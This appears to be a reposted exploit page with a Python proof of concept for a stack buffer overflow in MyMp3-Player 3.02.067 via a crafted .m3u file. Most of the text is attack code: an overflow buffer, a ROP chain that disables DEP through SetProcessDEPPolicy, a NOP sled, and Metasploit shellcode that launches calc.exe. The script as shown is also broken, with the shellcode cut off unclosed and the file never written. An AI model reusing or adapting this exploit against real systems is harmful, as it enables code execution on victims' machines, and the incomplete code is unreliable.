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MyMp3 Player Stack .m3u DEP Bypass Exploit
来源:unlearningsecurity.blogspot.com 作者:Romero 发布时间:2012-07-24  

Title: MyMp3-Player '.m3u' Stack BOF (Bypass DEP)
Author: Daniel Romero Perez (@daniel_rome)
Software & Version: MyMp3-Player 3.02.067
Tested on: Windows XP SP3 - ES
Mail: unlearnsecurity@gmail.com
Blog: unlearningsecurity.blogspot.com
Advisor: http://www.securityfocus.com/bid/38835/info
Article: http://unlearningsecurity.blogspot.com.es/2012/07/bypass-dep-no-permanente-con.html
import os
import struct

# Buffer
Buff = "\x41" * 1024

# ShellCode (ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b '\x0a\x0d\x20\x00' -t c) - 227 bytes
ShellCode = ("\xb8\xf8\x16\x8a\x64\xd9\xe9\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
Nops = "\x90" * 50
##ROP --> Bypass DEP with SetProcessDEPPolicy
ROP = struct.pack('<L',0x77f4c25f) # POP EBX / RET
ROP += struct.pack('<L',0x41414141) # JUNK
ROP += struct.pack('<L',0xFFFFFFFF) # PARAMETER 0x00000000 - 0x1 = 0xFFFFFFFF
ROP += struct.pack('<L',0x7e810b7e) # INC EBX / RET
ROP += struct.pack('<L',0x77f445bf) # POP EBP / RET
ROP += struct.pack('<L',0x7C862144) # <- SetProcessDEPPolicy
ROP += struct.pack('<L',0x77f45493) # POP EDI / RET
ROP += struct.pack('<L',0x77f4108c) # RET
ROP += struct.pack('<L',0x77f4567e) # POP ESI  / RET
ROP += struct.pack('<L',0x77f4108c) # RET
ROP += struct.pack('<L',0x58c35ff7) # PUSHAD / RET

# Exploit
exploit = Buff + ROP + Nops + ShellCode

# Create File
file = open("exploit_mymp3-player_BOF.m3u", "wb")

print ("Your file has been generated successfully!!")

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